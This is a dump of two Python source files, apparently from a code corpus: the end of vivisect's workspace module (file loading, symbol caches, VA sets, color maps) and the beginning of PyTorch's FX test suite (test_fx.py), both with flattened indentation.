fmtname = viv_parsers.guessFormat(bytes)
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
fd.seek(0)
filename = hashlib.md5( fd.read() ).hexdigest()
fname = mod.parseFd(self, fd, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def _saveSymbolCaches(self):
if not self.config.vdb.SymbolCacheActive:
return
pathstr = self.config.vdb.SymbolCachePath
symcache = e_symcache.SymbolCachePath(pathstr)
symsbyfile = collections.defaultdict(list)
# Get the image base addresses
imgbases = {}
for fname in self.getFiles():
imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
for va,name in self.name_by_va.items():
mmap = self.getMemoryMap(va)
if mmap is None:
continue
symva = va - imgbases.get(mmap[3], va)
if symva:
symtype = e_resolv.SYMSTOR_SYM_SYMBOL
if self.isFunction(va):
symtype = e_resolv.SYMSTOR_SYM_FUNCTION
symsbyfile[mmap[3]].append((symva, 0, name, symtype))
for filenorm, symtups in symsbyfile.items():
symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
if symhash is None:
continue
self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
( if it's a workspace, trigger loadWorkspace() as a convenience )
Returns the basename the file was given on load.
"""
mod = None
if fmtname is None:
fmtname = viv_parsers.guessFormatFilename(filename)
if fmtname in ('viv', 'mpviv'):
self.loadWorkspace(filename)
return self.normFileName(filename)
mod = viv_parsers.getParserModule(fmtname)
fname = mod.parseFile(self, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
"""
Load a memory map (or potentially a mapped binary file)
from the memory object's map at baseaddr.
"""
mod = None
if fmtname is None:
bytez = memobj.readMemory(baseaddr, 32)
fmtname = viv_parsers.guessFormat(bytez)
# TODO: Load workspace from memory?
mod = viv_parsers.getParserModule(fmtname)
mod.parseMemory(self, memobj, baseaddr)
mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
if not mapfname:
mapfname = 'mem_map_%.8x' % mapva
self.initMeta('StorageName', mapfname+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
def getFiles(self):
"""
Return the current list of file objects in this
workspace.
"""
return self.filemeta.keys()
def normFileName(self, filename):
normname = os.path.basename(filename).lower()
# Strip off an extension
if normname.find('.') != -1:
parts = normname.split('.')
normname = '_'.join(parts[:-1])
ok = string.letters + string.digits + '_'
chars = list(normname)
for i in range(len(chars)):
if chars[i] not in ok:
chars[i] = '_'
normname = ''.join(chars)
#if normname[0].isdigit():
#normname = '_' + normname
return normname
def addFile(self, filename, imagebase, md5sum):
"""
Create and add a new vivisect File object for the
specified information. This will return the file
object which you may then use to do things like
add imports/exports/segments etc...
"""
nname = self.normFileName(filename)
if nname in self.filemeta:
raise Exception("Duplicate File Name: %s" % nname)
self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
return nname
def addEntryPoint(self, va):
'''
Add an entry point to the definition for the given file. This
will hint the analysis system to create functions when analysis
is run.
NOTE: No analysis is triggered by this function.
'''
self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
'''
Get all the parsed entry points for all the files loaded into the
workspace.
Example: for va in vw.getEntryPoints():
'''
return [ x for x, in self.getVaSetRows('EntryPoints') ]
def setFileMeta(self, fname, key, value):
"""
Store a piece of file specific metadata (python primitives are best for values)
"""
if fname not in self.filemeta:
raise Exception("Invalid File: %s" % fname)
self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
"""
Retrieve a piece of file specific metadata
"""
d = self.filemeta.get(filename)
if d is None:
raise Exception("Invalid File: %s" % filename)
return d.get(key, default)
def getFileMetaDict(self, filename):
'''
Retrieve the file metadata for this file as a key:val dict.
'''
d = self.filemeta.get(filename)
if d is None:
raise Exception('Invalid File: %s' % filename)
return d
def getFileByVa(self, va):
segtup = self.getSegment(va)
if segtup is None:
return None
return segtup[SEG_FNAME]
def getLocationDistribution(self):
# NOTE: if this changes, don't forget the report module!
totsize = 0
for mapva, mapsize, mperm, mname in self.getMemoryMaps():
totsize += mapsize
loctot = 0
ret = {}
for i in range(LOC_MAX):
cnt = 0
size = 0
for lva,lsize,ltype,tinfo in self.getLocations(i):
cnt += 1
size += lsize
loctot += size
tname = loc_type_names.get(i, 'Unknown')
ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
# Update the undefined based on totals...
undeftot = totsize-loctot
ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
return ret
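# Illustrative sketch of consuming the distribution (keys are LOC_* constants):
#
#   for ltype, (tname, cnt, size, pct) in vw.getLocationDistribution().items():
#       print("%s: %d locations, %d bytes (%d%%)" % (tname, cnt, size, pct))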
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
"""
Get a list of the names of the current VA lists.
"""
return self.vasets.keys()
def getVaSetDef(self, name):
"""
Get the list of (name, type) pairs which make up the
rows for this given VA set (the first one *always* the VA, but
you can name it as you like...)
"""
x = self.vasetdefs.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def getVaSetRows(self, name):
"""
Get a list of the rows in this VA set.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x.values()
def getVaSet(self, name):
"""
Get the dictionary of va:<rowdata> entries.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def addVaSet(self, name, defs, rows=()):
"""
Add a va set:
name - The name for this VA set
defs - List of (<name>,<type>) tuples for the rows (va is always first)
rows - An initial set of rows for values in this set.
"""
self._fireEvent(VWE_ADDVASET, (name, defs, rows))
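# Hedged usage sketch for the VA set API. The set name and columns are made up,
# and the VASET_ADDRESS / VASET_STRING column type constants are assumed to come
# from vivisect.const.
#
#   vw.addVaSet('InterestingCalls', (('va', VASET_ADDRESS), ('note', VASET_STRING)))
#   vw.setVaSetRow('InterestingCalls', (callva, 'touches the registry'))
#   for va, note in vw.getVaSetRows('InterestingCalls'):
#       print("0x%.8x %s" % (va, note))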
def delVaSet(self, name):
"""
Delete a VA set by name.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
"""
Use this API to update the row data for a particular
entry in the VA set.
"""
self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
'''
Retrieve the va set row for va in the va set named name.
Example:
row = vw.getVaSetRow('WootFunctions', fva)
'''
vaset = self.vasets.get( name )
if vaset is None:
return None
return vaset.get( va )
def delVaSetRow(self, name, va):
"""
Use this API to delete the rowdata associated
with the specified VA from the set.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
uname = e_config.getusername()
# FIXME this should be part of a UI event model.
self._fireEvent(VWE_CHAT, (uname, msg))
def iAmLeader(self, winname):
'''
Announce that your workspace is leading a window with the
specified name. This allows others to opt-in to following
the nav events for the given window name.
Example:
vw.iAmLeader('WindowTitle')
'''
if not self.server:
raise Exception('iAmLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname))
def followTheLeader(self, winname, expr):
'''
Announce a new memory expression to navigate to if a given window
is following the specified user/winname
Example:
vw.followTheLeader('FunExample', 'sub_08042323')
'''
if not self.server:
raise Exception('followTheLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
"""
Return a list of the names of the given color maps
"""
return self.colormaps.keys()
def addColorMap(self, mapname, colormap):
"""
Add a colormap dictionary with the given name for the map.
(A colormap dictionary is va:color entries)
"""
self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
"""
Return the colormap dictionary for the given map name.
"""
return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
This is used by multiple analysis modules.
Uses _getNameParts.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart]) + '_%s' % vapart
else:
name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
# Check for a sym
va = self.vaByName(name)
if va is not None:
return e_resolv.Symbol(name, va, 0)
# check for the need for a deref.
d = self.filemeta.get(name)
if d is not None:
return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
name = self.getName(addr)
if name is None:
if self.isValidPointer(addr):
name = "loc_%.8x" % addr
if name is not None:
#FIXME fname
#FIXME functions/segments/etc...
return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
'''
Set a symbol hint which will be used in place of operand
values during disassembly among other things...
You may also set hint=None to delete sym hints.
'''
self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
h = self.getFref(va, idx)
if h is not None:
f = self.getFunction(va)
loctup = self.getFunctionLocal(f, h)
if loctup:
return loctup[1]
return self.symhints.get((va, idx), None)
class VivFileSymbol(e_resolv.FileSymbol):
# A namespace tracker thingie...
def __init__(self, vw, fname, base, size, width=4):
self.vw = vw
e_resolv.FileSymbol.__init__(self, fname, base, size, width)
def getSymByName(self, name):
return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
dname = os.path.dirname(__file__)
dname = os.path.abspath(dname)
return os.path.join(dname, *pathents)
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import io
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
import torch.nn.utils._stateless as _stateless
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
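# Note: checkGraphModule is the basic pattern most tests below follow. A minimal
# hedged equivalent outside the test harness (module/input are arbitrary) is:
#
#   m = SimpleTest()
#   gm = symbolic_trace(m)
#   gm.graph.lint()
#   x = torch.rand(3)
#   assert torch.equal(m(x), gm(x))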
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate that reports no leaf modules, so everything
# gets traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
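# wrapped_with_submodule is a wrapped helper (presumably registered elsewhere in this file),
# so it should survive tracing as a single call; the assertIn on m.code checks exactly that.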
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# Test that we can use Proxy objects to generate more graph code later, for cases that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# Test that we can use Proxy objects to generate more graph code later, for cases that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
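# Manually chosen node names ('foo_1_1', 'foo_1') could collide with auto-generated
# suffixes; after graph_copy, every node name must still be unique.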
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
@unittest.skip("Hotfix for SEV remediation")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
